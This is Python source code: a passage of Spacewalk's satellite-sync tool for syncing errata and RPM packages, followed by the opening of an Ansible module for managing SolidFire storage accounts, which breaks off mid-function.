rhnSQL.prepare(self._query_get_db_errata) for channel in relevant: db_channel_errata[channel] = ce = {} h.execute(channel=channel) while 1: row = h.fetchone_dict() if not row: break advisory_name = row['advisory_name'] erratum_id = row['id'] last_modified = rhnLib.timestamp(row['last_modified']) ce[advisory_name] = (erratum_id, last_modified) return db_channel_errata def _diff_errata(self): """ Fetch the errata for this channel""" db_channel_errata = self._get_db_channel_errata() relevant = self._channel_req.get_requested_channels() # Now get the channel's errata channel_errata = {} for chn in relevant: db_ce = db_channel_errata[chn] timestamp = self._get_channel_timestamp(chn) channel_obj = self._channel_collection.get_channel(chn, timestamp) errata_timestamps = channel_obj['errata_timestamps'] if errata_timestamps is None or self.forceAllErrata: # No unique key information, so assume we need all errata erratum_ids = channel_obj['errata'] errata = [(x, None, None) for x in erratum_ids] log(2, _("Grabbing all errata for channel %s") % chn) else: errata = [] # Check the advisory name and last modification for erratum in errata_timestamps: erratum_id = erratum['id'] last_modified = erratum['last_modified'] last_modified = rhnLib.timestamp(last_modified) advisory_name = erratum['advisory_name'] if db_ce.has_key(advisory_name): _foo, db_last_modified = db_ce[advisory_name] if last_modified == db_last_modified: # We already have this erratum continue errata.append((erratum_id, last_modified, advisory_name)) errata.sort() channel_errata[chn] = errata # Uniquify the errata already_seen_errata = set() for channel, errata in channel_errata.items(): uq_errata = set(errata) - already_seen_errata self._channel_errata[channel] = sorted(uq_errata) already_seen_errata.update(uq_errata) def _diff_db_errata(self): """ Compute errata that are missing from the satellite Kind of similar to diff_errata, if we had the timestamp and advisory information available """ errata_collection = sync_handlers.ErrataCollection() self._missing_channel_errata = missing_channel_errata = {} db_channel_errata = self._get_db_channel_errata() for channel, errata in self._channel_errata.items(): ch_erratum_ids = missing_channel_errata[channel] = [] for eid, timestamp, advisory_name in errata: if timestamp is not None: # Should have been caught by diff_errata ch_erratum_ids.append((eid, timestamp, advisory_name)) continue # timestamp is None, grab the erratum from the cache erratum = errata_collection.get_erratum(eid, timestamp) timestamp = rhnLib.timestamp(erratum['last_modified']) advisory_name = erratum['advisory_name'] db_erratum = db_channel_errata[channel].get(advisory_name) if db_erratum is None or db_erratum[1] != timestamp or \ self.forceAllErrata: ch_erratum_ids.append((eid, timestamp, advisory_name)) def download_errata(self): log(1, ["", _("Downloading errata data")]) if self.forceAllErrata: log(2, _("Forcing download of all errata data for requested channels.")) self._diff_errata() not_cached_errata = self._compute_not_cached_errata() stream_loader = StreamProducer( sync_handlers.get_errata_handler(), self.xmlDataServer, 'getErrataXmlStream') sorted_channels = sorted(not_cached_errata.items(), key=lambda x: x[0]) # sort by channel for channel, erratum_ids in sorted_channels: self._proces_batch(channel, erratum_ids[:], messages.erratum_parsing, stream_loader.process) stream_loader.close() # XXX This step should go away once the channel info contains the # errata timestamps and advisory names self._diff_db_errata() log(1, _("Downloading errata data complete")) # __private methods__ def _processWithProgressBar(self, batch, size, process_function, prompt=_('Downloading:'), nevermorethan=None, process_function_args=()): pb = ProgressBar(prompt=prompt, endTag=_(' - complete'), finalSize=size, finalBarLength=40, stream=sys.stdout) if CFG.DEBUG > 2: pb.redrawYN = 0 pb.printAll(1) ss = SequenceServer(batch, nevermorethan=(nevermorethan or self._batch_size)) while not ss.doneYN(): chunk = ss.getChunk() item_count = len(chunk) process_function(chunk, *process_function_args) ss.clearChunk() pb.addTo(item_count) pb.printIncrement() pb.printComplete() def _proces_batch(self, channel, batch, log_msg, process_function, prompt=_('Downloading:'), process_function_args=(), nevermorethan=None, is_slow=False): count = len(batch) if log_msg: log(1, log_msg % (channel, count or _('NONE RELEVANT'))) if not count: return if is_slow: log(1, messages.warning_slow) self._processWithProgressBar(batch, count, process_function, prompt, nevermorethan, process_function_args) def _import_packages_process(self, chunk, sources): batch = self._get_cached_package_batch(chunk, sources) # check to make sure the orgs exported are valid _validate_package_org(batch) try: sync_handlers.import_packages(batch, sources) except (SQLError, SQLSchemaError, SQLConnectError), e: # an SQL error is fatal... crash and burn exitWithTraceback(e, 'Exception caught during import', 13) def import_packages(self, sources=0): if sources: log(1, ["", _("Importing source package metadata")]) missing_channel_items = self._missing_channel_src_packages else: log(1, ["", _("Importing package metadata")]) missing_channel_items = self._missing_channel_packages sorted_channels = sorted(missing_channel_items.items(), key=lambda x: x[0]) # sort by channel for channel, packages in sorted_channels: self._proces_batch(channel, packages[:], messages.package_importing, self._import_packages_process, _('Importing: '), [sources]) return self._link_channel_packages() def _link_channel_packages(self): log(1, ["", messages.link_channel_packages]) short_package_collection = sync_handlers.ShortPackageCollection() _package_collection = sync_handlers.PackageCollection() uq_packages = {} for chn, package_ids in self._channel_packages_full.items(): for pid in package_ids: package = short_package_collection.get_package(pid) if not package: continue assert package is not None channel_obj = {'label': chn} if uq_packages.has_key(pid): # We've seen this package before - just add this channel # to it uq_packages[pid]['channels'].append(channel_obj) else: package['channels'] = [channel_obj] uq_packages[pid] = package uq_pkg_data = uq_packages.values() # check to make sure the orgs exported are valid _validate_package_org(uq_pkg_data) try: if OPTIONS.mount_point: # if OPTIONS.consider_full is not set interpret dump as incremental importer = sync_handlers.link_channel_packages(uq_pkg_data, strict=OPTIONS.consider_full) else: importer = sync_handlers.link_channel_packages(uq_pkg_data) except (SQLError, SQLSchemaError, SQLConnectError), e: # an SQL error is fatal... crash and burn exitWithTraceback(e, 'Exception caught during import', 14) return importer.affected_channels @staticmethod def _get_cached_package_batch(chunk, sources=0): """ short-circuit the most common case""" if not chunk: return [] short_package_collection = sync_handlers.ShortPackageCollection() if sources: package_collection = sync_handlers.SourcePackageCollection() else: package_collection = sync_handlers.PackageCollection() batch = [] for pid in chunk: package = package_collection.get_package(pid) if (package is None or package['last_modified'] != short_package_collection.get_package(pid) ['last_modified']): # not in the cache raise Exception(_("Package Not Found in Cache, Clear the Cache to \ Regenerate it.")) batch.append(package) return batch def import_errata(self): log(1, ["", _("Importing channel errata")]) errata_collection = sync_handlers.ErrataCollection() sorted_channels = sorted(self._missing_channel_errata.items(), key=lambda x: x[0]) # sort by channel_label for chn, errata in sorted_channels: log(2, _("Importing %s errata for channel %s.") % (len(errata), chn)) batch = [] for eid, timestamp, _advisory_name in errata: erratum = errata_collection.get_erratum(eid, timestamp) # bug 161144: it seems that incremental dumps can create an # errata collection None if erratum is not None: self._fix_erratum(erratum) batch.append(erratum) self._proces_batch(chn, batch, messages.errata_importing, sync_handlers.import_errata) @staticmethod def _fix_erratum(erratum): """ Replace the list of packages with references to short packages""" sp_coll = sync_handlers.ShortPackageCollection() pids = set(erratum['packages'] or []) # map all the pkgs objects to the erratum packages = [] # remove packages which are not in the export (e.g. archs we are not syncing) for pid in pids: if not sp_coll.has_package(pid): # Package not found, go on - may be part of a channel we don't # sync continue package = sp_coll.get_package(pid) packages.append(package) erratum['packages'] = packages if erratum['org_id'] is not None: erratum['org_id'] = OPTIONS.orgid or DEFAULT_ORG # Associate errata to only channels that are being synced # or are synced already imported_channels = _getImportedChannels() if OPTIONS.channel: imported_channels += OPTIONS.channel erratum['channels'] = [c for c in erratum['channels'] if c['label'] in imported_channels] # Now fix the files for errata_file in (erratum['files'] or []): errata_file_package = errata_file.get('package') errata_file_source_package = errata_file.get('source-package') if errata_file['file_type'] == 'RPM' and \ errata_file_package is not None: package = None if sp_coll.has_package(errata_file_package): package = sp_coll.get_package(errata_file_package) errata_file['pkgobj'] = package elif errata_file['file_type'] == 'SRPM' and \ errata_file_source_package is not None: # XXX misa: deal with source rpms errata_file['pkgobj'] = None def _fetch_packages(self, channel, missing_fs_packages, sources=0): short_package_collection = sync_handlers.ShortPackageCollection() if sources: # acronym = "SRPM" package_collection = sync_handlers.SourcePackageCollection() else: # acronym = "RPM" package_collection = sync_handlers.PackageCollection() self._failed_fs_packages = Queue.Queue() self._extinct_packages = Queue.Queue() pkgs_total = len(missing_fs_packages) pkg_current = 0 total_size = 0 queue = Queue.Queue() out_queue = Queue.Queue() lock = threading.Lock() # count size of missing packages for package_id, path in missing_fs_packages: package = package_collection.get_package(package_id) total_size = total_size + package['package_size'] queue.put((package_id, path)) log(1, messages.package_fetch_total_size % (self._bytes_to_fuzzy(total_size))) real_processed_size = processed_size = 0 real_total_size = total_size start_time = round(time.time()) all_threads = [] for _thread in range(4): t = ThreadDownload(lock, queue, out_queue, short_package_collection, package_collection, self, self._failed_fs_packages, self._extinct_packages, sources, channel) t.setDaemon(True) t.start() all_threads.append(t) while ([x for x in all_threads if x.isAlive()] and pkg_current < pkgs_total): try: (rpmManip, package, is_done) = out_queue.get(False, 0.1) except Queue.Empty: continue pkg_current = pkg_current + 1 if not is_done: # package failed to download or already exist on disk real_total_size -= package['package_size'] processed_size += package['package_size'] try: out_queue.task_done() except AttributeError: pass continue # Package successfully saved filename = os.path.basename(rpmManip.relative_path) # Determine downloaded size and remaining time size = package['package_size'] real_processed_size += size processed_size += size current_time = round(time.time()) # timedalta could not be multiplicated by float remain_time = (datetime.timedelta(seconds=current_time - start_time)) * \ ((real_total_size * 10000) / real_processed_size - 10000) / 10000 # cut off miliseconds remain_time = datetime.timedelta(remain_time.days, remain_time.seconds) log(1, messages.package_fetch_remain_size_time % (self._bytes_to_fuzzy(processed_size), self._bytes_to_fuzzy(total_size), remain_time)) log(1, messages.package_fetch_successful % (pkg_current, pkgs_total, filename, size)) try: out_queue.task_done() except AttributeError: pass extinct_count = self._extinct_packages.qsize() failed_count = self._failed_fs_packages.qsize() # Printing summary log(2, messages.package_fetch_summary % channel, notimeYN=1) log(2, messages.package_fetch_summary_success % (pkgs_total - extinct_count - failed_count), notimeYN=1) log(2, messages.package_fetch_summary_failed % failed_count, notimeYN=1) log(2, messages.package_fetch_summary_extinct % extinct_count, notimeYN=1) # Translate x bytes to string "x MB", "x GB" or "x kB" @staticmethod def _bytes_to_fuzzy(b): units = ['bytes', 'kiB', 'MiB', 'GiB', 'TiB', 'PiB'] base = 1024 fuzzy = b for unit in units: if fuzzy >= base: fuzzy = float(fuzzy) / base else: break int_len = len("%d" % fuzzy) fract_len = 3 - int_len # pylint: disable=W0631 return "%*.*f %s" % (int_len, fract_len, fuzzy, unit) def _get_package_stream(self, channel, package_id, nvrea, sources): """ returns (filepath, stream), so in the case of a "wire source", the return value is, of course, (None, stream) """ # Returns a package stream from disk if self.mountpoint: rpmFile = rpmsPath(package_id, self.mountpoint, sources) try: stream = open(rpmFile) except IOError, e: if e.errno != 2: # No such file or directory raise return (rpmFile, None) return (rpmFile, stream) # Wire stream if CFG.ISS_PARENT: stream = self.xmlDataServer.getRpm(nvrea, channel) else: rpmServer = xmlWireSource.RPCGetWireSource(self.systemid, self.sslYN, self.xml_dump_version) stream = rpmServer.getPackageStream(channel, nvrea) return (None, stream) class ThreadDownload(threading.Thread): def __init__(self, lock, queue, out_queue, short_package_collection, package_collection, syncer, failed_fs_packages, extinct_packages, sources, channel): threading.Thread.__init__(self) self.queue = queue self.out_queue = out_queue self.short_package_collection = short_package_collection self.package_collection = package_collection self.syncer = syncer self.failed_fs_packages = failed_fs_packages self.extinct_packages = extinct_packages self.sources = sources self.channel = channel self.lock = lock def run(self): while not self.queue.empty(): # grabs host from queue (package_id, path) = self.queue.get() package = self.package_collection.get_package(package_id) last_modified = package['last_modified'] checksum_type = package['checksum_type'] checksum = package['checksum'] package_size = package['package_size'] if not path: nevra = get_nevra(package) orgid = None if package['org_id']: orgid = OPTIONS.orgid or DEFAULT_ORG path = self.syncer._get_rel_package_path(nevra, orgid, self.sources, checksum_type, checksum) # update package path package['path'] = path self.package_collection.add_item(package) errcode = self.syncer._verify_file(path, rhnLib.timestamp(last_modified), package_size, checksum_type, checksum) if errcode == 0: # file is already there # do not count this size to time estimate try: self.queue.task_done() except AttributeError: pass self.out_queue.put((None, package, False)) continue cfg = config.initUp2dateConfig() rpmManip = RpmManip(package, path) nvrea = rpmManip.nvrea() # Retry a number of times, we may have network errors for _try in range(cfg['networkRetries']): self.lock.acquire() try: rpmFile, stream = self.syncer._get_package_stream(self.channel, package_id, nvrea, self.sources) except: self.lock.release() raise self.lock.release() if stream is None: # Mark the package as extinct self.extinct_packages.put(package_id) log(1, messages.package_fetch_extinct % (os.path.basename(path))) break # inner for try: rpmManip.write_file(stream) break # inner for except FileCreationError, e: msg = e.args[0] log2disk(-1, _("Unable to save file %s: %s") % ( rpmManip.full_path, msg)) # Try again continue # inner for else: # for # Ran out of iterations # Mark the package as failed and move on self.failed_fs_packages.put(package_id) log(1, messages.package_fetch_failed % (os.path.basename(path))) # Move to the next package try: self.queue.task_done() except AttributeError: pass self.out_queue.put((rpmManip, package, False)) continue if stream is None: # Package is extinct. Move on try: self.queue.task_done() except AttributeError: pass self.out_queue.put((rpmManip, package, False)) continue if self.syncer.mountpoint and not self.syncer.keep_rpms: # Channel dumps import; try to unlink to preserve disk space # rpmFile is always returned by _get_package_stream for # disk-based imports assert(rpmFile is not None) try: os.unlink(rpmFile) except (OSError, IOError): pass # signals to queue job is done try: self.queue.task_done() except AttributeError: pass self.out_queue.put((rpmManip, package, True)) class StreamProducer: def __init__(self, handler, data_source_class, source_func): self.handler = handler self.is_disk_loader = data_source_class.is_disk_loader() if self.is_disk_loader: self.loader = getattr(data_source_class, source_func)() else: self.loader = getattr(data_source_class, source_func) self._args = () def set_args(self, *args): self._args = args def close(self): self.handler.close() def process(self, batch): if self.is_disk_loader: for oid in batch: self.loader.setID(oid) stream = self.loader.load() self.handler.process(stream) else: # Only use the extra arguments if needed, for now args = self._args or (batch, ) stream = self.loader(*args) self.handler.process(stream) def _verifyPkgRepMountPoint(): """ Checks the base package repository directory tree for existance and permissions. Creates base dir if need be, and chowns to apache.root (required for rhnpush). """ if not CFG.MOUNT_POINT: # Incomplete configuration log(-1, _("ERROR: server.mount_point not set in the configuration file")) sys.exit(16) if not os.path.exists(fileutils.cleanupAbsPath(CFG.MOUNT_POINT)): log(-1, _("ERROR: server.mount_point %s do not exist") % fileutils.cleanupAbsPath(CFG.MOUNT_POINT)) sys.exit(26) if not os.path.exists(fileutils.cleanupAbsPath(CFG.MOUNT_POINT + '/' + CFG.PREPENDED_DIR)): log(-1, _("ERROR: path under server.mount_point (%s) do not exist") % fileutils.cleanupAbsPath(CFG.MOUNT_POINT + '/' + CFG.PREPENDED_DIR)) sys.exit(26) def _validate_package_org(batch): """Validate the orgids associated with packages. If its redhat channel default to Null org If custom channel and org is specified use that. If custom and package org is not valid default to org 1 """ orgid = OPTIONS.orgid or None for pkg in batch: if not pkg['org_id'] or pkg['org_id'] == 'None': # default to Null so do nothing pkg['org_id'] = None elif orgid: # if options.orgid specified use it pkg['org_id'] = orgid else: # org from server is not valid pkg['org_id'] = DEFAULT_ORG def _getImportedChannels(): "Retrieves the channels already imported in the satellite's database" try: if OPTIONS.include_custom_channels: h = rhnSQL.prepare("""select label from rhnChannel""") else: h = rhnSQL.prepare("""select label from rhnChannel where org_id is null""") h.execute() return [x['label'] for x in h.fetchall_dict() or []] except (SQLError, SQLSchemaError, SQLConnectError), e: # An SQL error is fatal... crash and burn exitWithTraceback(e, 'SQL ERROR during xml processing', 17) return [] def getDbIssParent(): sql = "select label from rhnISSMaster where is_current_master = 'Y'" h = rhnSQL.prepare(sql) h.execute() row = h.fetchone_dict() if not row: return None return row['label'] def getDbCaChain(master): sql = "select ca_cert from rhnISSMaster where label = :label" h = rhnSQL.prepare(sql) h.execute(label=master) row = h.fetchone_dict() if not row: return None return row['ca_cert'] def processCommandline(): "process the commandline, setting the OPTIONS object" log2disk(-1, _("Commandline: %s") % repr(sys.argv)) optionsTable = [ Option('--batch-size', action='store', help=_('DEBUG ONLY: max. batch-size for XML/database-import processing (1..%s).' + '"man satellite-sync" for more information.') % SequenceServer.NEVER_MORE_THAN), Option('--ca-cert', action='store', help=_('alternative SSL CA Cert (fullpath to cert file)')), Option('-c', '--channel', action='append', help=_('process data for this channel only')), Option('--consider-full', action='store_true', help=_('disk dump will be considered to be a full export; ' 'see "man satellite-sync" for more information.')), Option('--include-custom-channels', action='store_true', help=_('existing custom channels will also be synced (unless -c is used)')), Option('--debug-level', action='store', help=_('override debug level set in /etc/rhn/rhn.conf (which is currently set at %s).') % CFG.DEBUG), Option('--dump-version', action='store', help=_("requested version of XML dump (default: %s)") % constants.PROTOCOL_VERSION), Option('--email', action='store_true', help=_('e-mail a report of what was synced/imported')), Option('--force-all-errata', action='store_true', help=_('forcibly process all (not a diff of) errata metadata')), Option('--force-all-packages', action='store_true', help=_('forcibly process all (not a diff of) package metadata')), Option('--http-proxy', action='store', help=_('alternative http proxy (hostname:port)')), Option('--http-proxy-username', action='store', help=_('alternative http proxy username')), Option('--http-proxy-password', action='store', help=_('alternative http proxy password')), Option('--iss-parent', action='store', help=_('parent satellite to import content from')), Option('-l', '--list-channels', action='store_true', help=_('list all available channels and exit')), Option('--list-error-codes', action='store_true', help=_("help on all error codes satellite-sync returns")), Option('-m', '--mount-point', action='store', help=_('source mount point for import - disk update only')), Option('--no-errata', action='store_true', help=_('do not process errata data')), Option('--no-kickstarts', action='store_true', help=_('do not process kickstart data (provisioning only)')), Option('--no-packages', action='store_true', help=_('do not process full package metadata')), Option('--no-rpms', action='store_true', help=_('do not download, or process any RPMs')), Option('--no-ssl', action='store_true', help=_('turn off SSL (not recommended)')), Option('--orgid', action='store', help=_('org to which the sync imports data. defaults to the admin account')), Option('-p', '--print-configuration', action='store_true', help=_('print the configuration and exit')), Option('--rhn-cert', action='store', help=_('satellite certificate to import ') + _('(use with --mount-point only)')), Option('-s', '--server', action='store', help=_('alternative server with which to connect (hostname)')), Option('--step', action='store', help=_('synchronize to this step (man satellite-sync for more info)')), Option('--systemid', action='store', help=_("DEBUG ONLY: alternative path to digital system id")), Option('--traceback-mail', action='store', help=_('alternative email address(es) for sync output (--email option)')), Option('--keep-rpms', action='store_true', help=_('do not remove rpms when importing from local dump')), Option('--master', action='store', help=_('the fully qualified domain name of the master Satellite. ' 'Valid with --mount-point only. ' 'Required if you want to import org data and channel permissions.')), ] optionParser = OptionParser(option_list=optionsTable) global OPTIONS OPTIONS, args = optionParser.parse_args() # we take extra commandline arguments that are not linked to an option if args: msg = _("ERROR: these arguments make no sense in this context (try --help): %s") % repr(args) log2stderr(-1, msg, 1, 1) sys.exit(19) # # process anything CFG related (db, debug, server, and print) # try: rhnSQL.initDB() rhnSQL.clear_log_id() rhnSQL.set_log_auth_login('SETUP') except (SQLError, SQLSchemaError, SQLConnectError), e: # An SQL error is fatal... crash and burn log(-1, _("ERROR: Can't connect to the database: %s") % e, stream=sys.stderr) log(-1, _("ERROR: Check if your database is running."), stream=sys.stderr) sys.exit(20) CFG.set("ISS_Parent", getDbIssParent()) CFG.set("TRACEBACK_MAIL", OPTIONS.traceback_mail or CFG.TRACEBACK_MAIL) CFG.set("RHN_PARENT", idn_ascii_to_pune(OPTIONS.iss_parent or OPTIONS.server or CFG.ISS_PARENT or CFG.RHN_PARENT)) if OPTIONS.server and not OPTIONS.iss_parent: # server option on comman line should override ISS parent from config CFG.set("ISS_PARENT", None) else: CFG.set("ISS_PARENT", idn_ascii_to_pune(OPTIONS.iss_parent or CFG.ISS_PARENT)) CFG.set("ISS_CA_CHAIN", OPTIONS.ca_cert or getDbCaChain(CFG.RHN_PARENT) or CFG.CA_CHAIN) CFG.set("HTTP_PROXY", idn_ascii_to_pune(OPTIONS.http_proxy or CFG.HTTP_PROXY)) CFG.set("HTTP_PROXY_USERNAME", OPTIONS.http_proxy_username or CFG.HTTP_PROXY_USERNAME) CFG.set("HTTP_PROXY_PASSWORD", OPTIONS.http_proxy_password or CFG.HTTP_PROXY_PASSWORD) CFG.set("CA_CHAIN", OPTIONS.ca_cert or CFG.CA_CHAIN) # check the validity of the debug level if OPTIONS.debug_level: debugRange = 6 try: debugLevel = int(OPTIONS.debug_level) if not (0 <= debugLevel <= debugRange): raise RhnSyncException, "exception will be caught", sys.exc_info()[2] except KeyboardInterrupt, e: raise # pylint: disable=E0012, W0703 except Exception: msg = [_("ERROR: --debug-level takes an in integer value within the range %s.") % repr(tuple(range(debugRange + 1))), _(" 0 - little logging/messaging."), _(" 1 - minimal logging/messaging."), _(" 2 - normal level of logging/messaging."), _(" 3 - lots of logging/messaging."), _(" 4+ - excessive logging/messaging.")] log(-1, msg, 1, 1, sys.stderr) sys.exit(21) else: CFG.set('DEBUG', debugLevel) initLOG(CFG.LOG_FILE, debugLevel) if OPTIONS.print_configuration: CFG.show() sys.exit(0) if OPTIONS.master: if not OPTIONS.mount_point: msg = _("ERROR: The --master option is only valid with the --mount-point option") log2stderr(-1, msg, cleanYN=1) sys.exit(28) elif CFG.ISS_PARENT: OPTIONS.master = CFG.ISS_PARENT if OPTIONS.orgid: # verify if its a valid org orgs = [a['id'] for a in satCerts.get_all_orgs()] if int(OPTIONS.orgid) not in orgs: msg = _("ERROR: Unable to lookup Org Id %s") % OPTIONS.orgid log2stderr(-1, msg, cleanYN=1) sys.exit(27) # the action dictionary used throughout actionDict = {} if OPTIONS.list_channels: if OPTIONS.step: log(-1, _("WARNING: --list-channels option overrides any --step option. --step ignored.")) OPTIONS.step = 'channels' actionDict['list-channels'] = 1 else: actionDict['list-channels'] = 0 # # validate the --step option and set up the hierarchy of sync process steps. # stepHierarchy = Runner.step_hierarchy # if no step stated... we do all steps. if not OPTIONS.step: OPTIONS.step = stepHierarchy[-1] if OPTIONS.step not in stepHierarchy: log2stderr(-1, _("ERROR: '%s' is not a valid step. See 'man satellite-sync' for more detail.") % OPTIONS.step, 1, 1) sys.exit(22) # XXX: --source is deferred for the time being #OPTIONS.source = OPTIONS.step in sourceSteps # populate the action dictionary for step in stepHierarchy: actionDict[step] = 1 if step == OPTIONS.step: break # make sure *all* steps in the actionDict are handled. for step in stepHierarchy: actionDict[step] = actionDict.has_key(step) channels = OPTIONS.channel or [] if OPTIONS.list_channels: actionDict['channels'] = 1 actionDict['arches'] = 0 actionDict['channel-families'] = 1 channels = [] # Cleanup selected channels. # if no channels selected, the default is to "freshen", or select the # already existing channels in the local database. if not channels: channels = _getImportedChannels() if not channels: if actionDict['channels'] and not actionDict['list-channels']: msg = _("ERROR: No channels currently imported; try satellite-sync --list-channels; " + "then satellite-sync -c chn0 -c chn1...") log2disk(-1, msg) log2stderr(-1, msg, cleanYN=1) sys.exit(0) # add all the "other" actions specified. otherActions = {"no_rpms": 'no-rpms', #"no_srpms" : 'no-srpms', "no_packages": 'no-packages', #"no_source_packages" : 'no-source-packages', "no_errata": 'no-errata', "no_kickstarts": 'no-kickstarts', "force_all_packages": 'force-all-packages', "force_all_errata": 'force-all-errata', 'no_ssl': 'no-ssl'} for oa in otherActions.keys(): if getattr(OPTIONS, oa): actionDict[otherActions[oa]] = 1 else: actionDict[otherActions[oa]] = 0 if actionDict['no-kickstarts']: actionDict['kickstarts'] = 0 if actionDict['no-errata']: actionDict['errata'] = 0 # if actionDict['no-source-packages']: actionDict['source-packages'] = 0 if actionDict['no-packages']: actionDict['packages'] = 0 actionDict['short'] = 0 actionDict['download-packages'] = 0 actionDict['rpms'] = 0 if actionDict['no-rpms']: actionDict['rpms'] = 0 # if actionDict['no-srpms']: actionDict['srpms'] = 0 if not OPTIONS.master: actionDict['orgs'] = 0 if OPTIONS.batch_size: try: OPTIONS.batch_size = int(OPTIONS.batch_size) if OPTIONS.batch_size not in range(1, 51): raise ValueError(_("ERROR: --batch-size must have a value within the range: 1..50")) except (ValueError, TypeError): # int(None) --> TypeError # int('a') --> ValueError raise ValueError(_("ERROR: --batch-size must have a value within the range: 1..50")), \ None, sys.exc_info()[2] OPTIONS.mount_point = fileutils.cleanupAbsPath(OPTIONS.mount_point) OPTIONS.rhn_cert = fileutils.cleanupAbsPath(OPTIONS.rhn_cert) OPTIONS.systemid = fileutils.cleanupAbsPath(OPTIONS.systemid) if OPTIONS.rhn_cert: if not OPTIONS.mount_point: msg = _("ERROR: --rhn-cert requires --mount-point") log2stderr(-1, msg, cleanYN=1) sys.exit(23) if not os.path.isfile(OPTIONS.rhn_cert): msg = _("ERROR: no such file %s") % OPTIONS.rhn_cert log2stderr(-1, msg, cleanYN=1) sys.exit(24) if OPTIONS.mount_point: if not os.path.isdir(OPTIONS.mount_point): msg = _("ERROR: no such directory %s") % OPTIONS.mount_point log2stderr(-1, msg, cleanYN=1) sys.exit(25) if OPTIONS.list_error_codes: msg = [_("Error Codes: Returned codes means:"), _(" -1 - Could not lock file or KeyboardInterrupt or SystemExit"), _(" 0 - User interrupted or intentional exit"), _(" 1 - attempting to run more than one instance of satellite-sync."), _(" 2 - Unable to find synchronization tools."), _(" 3 - a general socket exception occurred"), _(" 4 - an SSL error occurred. Recheck your SSL settings."), _(" 5 - RHN error"), _(" 6 - unhandled exception occurred"), _(" 7 - unknown sync error"), _(" 8 - ERROR: must be root to execute"), _(" 9 - rpclib fault during synchronization init"), _(" 10 - synchronization init error"), _(" 11 - Error parsing XML stream"), _(" 12 - Channel do not exist"), _(" 13 - SQL error during importing package metadata"), _(" 14 - SQL error during linking channel packages"), _(" 15 - SQL error during xml processing"), _(" 16 - server.mount_point not set in the configuration file"), _(" 17 - SQL error during retrieving the channels already imported in the satellite's database"), _(" 18 - Wrong db connection string in rhn.conf"), _(" 19 - Bad arguments"), _(" 20 - Could not connect to db."), _(" 21 - Bad debug level"), _(" 22 - Not valid step"), _(" 23 - error: --rhn-cert requires --mount-point"), _(" 24 - no such file"), _(" 25 - no such directory"), _(" 26 - mount_point does not exist"), _(" 27 - No such org"), _(" 28 - error: --master is only valid with --mount-point"), ] log(-1, msg, 1, 1, sys.stderr) sys.exit(0) if OPTIONS.dump_version: OPTIONS.dump_version = str(OPTIONS.dump_version) if OPTIONS.dump_version not in constants.ALLOWED_SYNC_PROTOCOL_VERSIONS: msg = _("ERROR: unknown dump version, try one of %s") % \ constants.ALLOWED_SYNC_PROTOCOL_VERSIONS log2stderr(-1, msg, cleanYN=1) sys.exit(19) # return the dictionary of actions, channels return actionDict, channels def formatDateTime(dtstring=None, dt=None): """ Format the date time using your locale settings. This assume that your setlocale has been alread called. """ if not dt: dt = time.strptime(dtstring, '%Y%m%d%H%M%S') return time.strftime("%c", dt) if __name__ == '__main__': sys.stderr.write("!!! running this directly is advisable *ONLY* for testing" " purposes !!!\n") try: sys.exit(Runner().main() or 0) except (KeyboardInterrupt, SystemExit), ex: sys.exit(ex) except Exception: # pylint: disable=E0012, W0703 from spacewalk.common.rhnTB import fetchTraceback tb = 'TRACEBACK: ' + fetchTraceback(with_locals=1) log2disk(-1, tb) log2email(-1, tb) sendMail() sys.exit(-1)
#!/usr/bin/python # (c) 2017, NetApp, Inc # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.0'} DOCUMENTATION = ''' module: sf_account_manager short_description: Manage SolidFire accounts extends_documentation_fragment: - netapp.solidfire version_added: '2.3' author: Sumit Kumar ([email protected]) description: - Create, destroy, or update accounts on SolidFire options: state: description: - Whether the specified account should exist or not. required: true choices: ['present', 'absent'] name: description: - Unique username for this account. (May be 1 to 64 characters in length). required: true new_name: description: - New name for the user account. required: false default: None initiator_secret: description: - CHAP secret to use for the initiator. Should be 12-16 characters long and impenetrable. - The CHAP initiator secrets must be unique and cannot be the same as the target CHAP secret. - If not specified, a random secret is created. required: false target_secret: description: - CHAP secret to use for the target (mutual CHAP authentication). - Should be 12-16 characters long and impenetrable. - The CHAP target secrets must be unique and cannot be the same as the initiator CHAP secret. - If not specified, a random secret is created. required: false attributes: description: List of Name/Value pairs in JSON object format. required: false account_id: description: - The ID of the account to manage or update. required: false default: None status: description: - Status of the account. required: false ''' EXAMPLES = """ - name: Create Account sf_account_manager: hostname: "{{ solidfire_hostname }}" username: "{{ solidfire_username }}" password: "{{ solidfire_password }}" state: present name: TenantA - name: Modify Account sf_account_manager: hostname: "{{ solidfire_hostname }}" username: "{{ solidfire_username }}" password: "{{ solidfire_password }}" state: present name: TenantA new_name: TenantA-Renamed - name: Delete Account sf_account_manager: hostname: "{{ solidfire_hostname }}" username: "{{ solidfire_username }}" password: "{{ solidfire_password }}" state: absent name: TenantA-Renamed """ RETURN = """ """ from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.pycompat24 import get_exception import ansible.module_utils.netapp as netapp_utils HAS_SF_SDK = netapp_utils.has_sf_sdk() class SolidFireAccount(object): def __init__(self): self.argument_spec = netapp_utils.ontap_sf_host_argument_spec() self.argument_spec.update(dict( state=dict(required=True, choices=['present', 'absent']), name=dict(required=True, type='str'), account_id=dict(required=False, type='int', default=None), new_name=dict(required=False, type='str', default=None), initiator_secret=dict(required=False, type='str'), target_secret=dict(required=False, type='str'), attributes=dict(required=False, type='dict'), status=dict(required=False, type='str'), )) self.module = AnsibleModule( argument_spec=self.argument_spec, supports_check_mode=True ) p = self.module.params # set up state variables self.state = p['state'] self.name = p['name'] self.account_id = p['account_id'] self.new_name = p['new_name'] self.initiator_secret = p['initiator_secret'] self.target_secret = p['target_secret'] self.attributes = p['attributes'] self.status = p['status'] if HAS_SF_SDK is False: self.module.fail_json(msg="Unable to import the SolidFire Python SDK") else: self.sfe = netapp_utils.create_sf_connection(module=self.module) def get_account(self): """ Return account object if found :return: Details about the account. None if not found. :rtype: dict """ account_list = self.sfe.list_accounts() for account in account_list.accounts: if account.username == self.name: # Update self.account_id: if self.account_id is not None: if account.account_id == self.account_id: return account else: 